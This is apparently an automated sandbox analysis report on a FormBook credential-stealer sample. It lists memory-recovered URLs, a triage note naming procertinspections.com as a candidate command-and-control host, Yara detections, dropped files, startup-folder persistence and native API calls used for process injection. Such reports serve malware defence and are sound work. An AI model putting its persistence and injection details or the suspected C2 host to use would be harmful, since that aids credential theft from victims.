Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: help.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmp, String found in binary or memory: http://www.procertinspections.com
Source: help.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmp, String found in binary or memory: http://www.procertinspections.com/zsh/
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp, String found in binary or memory: https://github.com/Pester/Pesterd
Source: powershell.exe, 00000005.00000002.341468263.00000000057B2000.00000004.00000001.sdmp, String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

Triage note: of the URLs above, only http://www.procertinspections.com and http://www.procertinspections.com/zsh/ were recovered from help.exe, the explorer.exe child whose memory (dump 00000018) also matched the FormBook Yara rules listed under AV Detection; those two are the candidates for C2 follow-up. The powershell.exe strings (Pester, NuGet, contoso.com, the xmlsoap claims schema) are PowerShell module metadata, and the explorer.exe strings are font-foundry URLs carried in font metadata; neither group points at attacker infrastructure.

E-Banking Fraud:

Yara detected FormBook (same 22 Yara match sources as listed under AV Detection above: 18 memory dumps and 4 unpacked PEs)

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\help.exe, Dropped file: C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogri.ini
Source: C:\Windows\SysWOW64\help.exe, Dropped file: C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C438E8 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C438E3 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_050238E8 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_050238E3 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041A050 NtClose
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041A100 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00419F20 NtCreateFile
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00419FD0 NtReadFile
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041A04E NtClose
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041A0FA NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00419F72 NtCreateFile
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00419FCB NtReadFile
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011599A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011598F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011595D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011597A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011596E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159950 NtQueueApcThread
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011599D0 NtCreateProcessEx
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159820 NtEnumerateKey
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0115B040 NtSuspendThread
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011598A0 NtWriteVirtualMemory
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159B00 NtSetValueKey
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0115A3B0 NtGetContextThread
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159A10 NtQuerySection
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159A80 NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0115AD30 NtSetContextThread
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159520 NtWaitForSingleObject
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159560 NtWriteFile
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011595F0 NtQueryInformationFile
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0115A710 NtOpenProcessToken
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159730 NtQueryVirtualMemory
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0115A770 NtOpenThread
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159770 NtSetInformationFile
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159760 NtOpenProcess
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159FE0 NtCreateMutant
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159610 NtEnumerateValueKey
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159650 NtQueryValueKey
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01159670 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011596D0 NtCreateKey
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_019491B8
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_019496C0
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_01947A90
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_0194CEC8
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_019491C8
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_0194F128
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_0194D378
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_0194D369
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_0194F928
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Code function: 1_2_00F42050
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_05338B68
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_05338B58
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008C91B8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008C7A90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CD010
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008C91C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CF128
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CD369
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008C96C0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C4BFF8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C431C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C46140
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C452A3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C452A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C4BFE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C46B70
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_00232050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_010191C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_010196C0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_01017A90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0101CEC8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0101F117
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_010191B8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0101D36B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0101D378
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0101F928
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05020D00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0502BFF8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_050291F1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05020040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05023A08
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05022F48
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0502BFE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05026140
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05024860
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05026B70
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_05025299
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_050252A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_00692050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00401030
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041D997
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041D20B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00402D87
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00402D90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00409E30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041D6BE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0111F900
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_01134120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011D1002
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011EE824
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0112B090
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E20A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_011E28EC
